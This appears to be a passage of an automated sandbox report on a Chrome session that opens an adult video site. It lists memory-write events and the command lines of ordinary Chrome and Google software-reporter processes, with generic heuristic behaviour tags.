PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 4984	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5052	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5052	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe
PID 4440 wrote to memory of 5108	4440	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://pornovideos8k.com/watch.php
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xc8,0xcc,0xd0,0xa4,0xd4,0x7ff9e8384f50,0x7ff9e8384f60,0x7ff9e8384f70
2⤵
PID:4568

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1636 /prefetch:2
2⤵
PID:4984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1684 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:5052

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2272 /prefetch:8
2⤵
PID:5108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:1
2⤵
PID:2156

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2676 /prefetch:1
2⤵
PID:1904

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1
2⤵
PID:3996

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
2⤵
PID:4168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:1
2⤵
PID:4260

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
2⤵
PID:4336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5200 /prefetch:8
2⤵
PID:2716

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6328 /prefetch:8
2⤵
PID:3440

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6464 /prefetch:8
2⤵
PID:3672

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6336 /prefetch:8
2⤵
PID:3404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6620 /prefetch:8
2⤵
PID:1152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5888 /prefetch:8
2⤵
PID:2184

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4064 /prefetch:8
2⤵
PID:4664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3724 /prefetch:8
2⤵
PID:3256

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
2⤵
PID:3116

C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x240,0x244,0x248,0x21c,0x1ec,0x7ff66690a890,0x7ff66690a8a0,0x7ff66690a8b0
3⤵
PID:3632

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3328 /prefetch:8
2⤵
PID:5064

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3816 /prefetch:8
2⤵
PID:4292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3996 /prefetch:8
2⤵
PID:844

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3960 /prefetch:8
2⤵
PID:1232

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3952 /prefetch:8
2⤵
PID:3268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3608 /prefetch:8
2⤵
PID:2696

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3540 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:2744

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3324 /prefetch:8
2⤵
PID:3572

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3868 /prefetch:8
2⤵
PID:4404

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6564 /prefetch:8
2⤵
PID:4220

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:8
2⤵
PID:1740

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5928 /prefetch:8
2⤵
PID:4500

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5816 /prefetch:8
2⤵
PID:4140

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6604 /prefetch:8
2⤵
PID:3700

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4280 /prefetch:8
2⤵
PID:3520

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6012 /prefetch:8
2⤵
PID:3336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5844 /prefetch:8
2⤵
PID:3932

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5572 /prefetch:8
2⤵
PID:4664

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3320 /prefetch:8
2⤵
PID:4104

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3360 /prefetch:8
2⤵
PID:4576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5592 /prefetch:8
2⤵
PID:3984

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6876 /prefetch:8
2⤵
PID:4120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7048 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3924

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5428 /prefetch:8
2⤵
PID:1292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7100 /prefetch:8
2⤵
PID:4160

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7244 /prefetch:8
2⤵
PID:2120

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7360 /prefetch:8
2⤵
PID:4292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6668 /prefetch:8
2⤵
PID:2148

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7556 /prefetch:8
2⤵
PID:3268

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7704 /prefetch:8
2⤵
PID:4336

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7844 /prefetch:8
2⤵
PID:2732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:1
2⤵
PID:4180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5412 /prefetch:1
2⤵
PID:4328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7928 /prefetch:1
2⤵
PID:3624

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=1604 /prefetch:8
2⤵
PID:1468

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6568 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3524

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4212 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:4460

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4912 /prefetch:8
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3880

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2056 /prefetch:8
2⤵
PID:1008

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5016 /prefetch:8
2⤵
PID:4168

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=7112 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1192

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7112 /prefetch:8
2⤵
PID:2212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1624,4859859956486660182,13766244018215452157,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6028 /prefetch:8
2⤵
PID:1212

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\90.262.200\software_reporter_tool.exe
"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\SwReporter\90.262.200\software_reporter_tool.exe" --engine=2 --scan-locations=1,2,3,4,5,6,7,8,10 --disabled-locations=9,11 --session-id=nvCVtieYvccNzlUTBNKTe8s0pE6csJpiqH4nq3pw --registry-suffix=ESET --srt-field-trial-group-name=NewCleanerUIExperiment
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\90.262.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\90.262.200\software_reporter_tool.exe" --crash-handler "--database=c:\users\admin\appdata\local\Google\Software Reporter Tool" --url=https://clients2.google.com/cr/report --annotation=plat=Win32 --annotation=prod=ChromeFoil --annotation=ver=90.262.200 --initial-client-data=0x250,0x254,0x258,0x22c,0x25c,0x7ff60928a808,0x7ff60928a818,0x7ff60928a828
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1852

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\90.262.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\90.262.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_1588_BOZPAVVYQPNRIPUZ" --sandboxed-process-id=2 --init-done-notifier=716 --sandbox-mojo-pipe-token=13639004685378298163 --mojo-platform-channel-handle=692 --engine=2
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:844

\??\c:\users\admin\appdata\local\google\chrome\user data\swreporter\90.262.200\software_reporter_tool.exe
"c:\users\admin\appdata\local\google\chrome\user data\swreporter\90.262.200\software_reporter_tool.exe" --use-crash-handler-with-id="\\.\pipe\crashpad_1588_BOZPAVVYQPNRIPUZ" --sandboxed-process-id=3 --init-done-notifier=936 --sandbox-mojo-pipe-token=10034466739704060838 --mojo-platform-channel-handle=932
3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2868

C:\Program Files\Google\Chrome\Application\chrome.exe
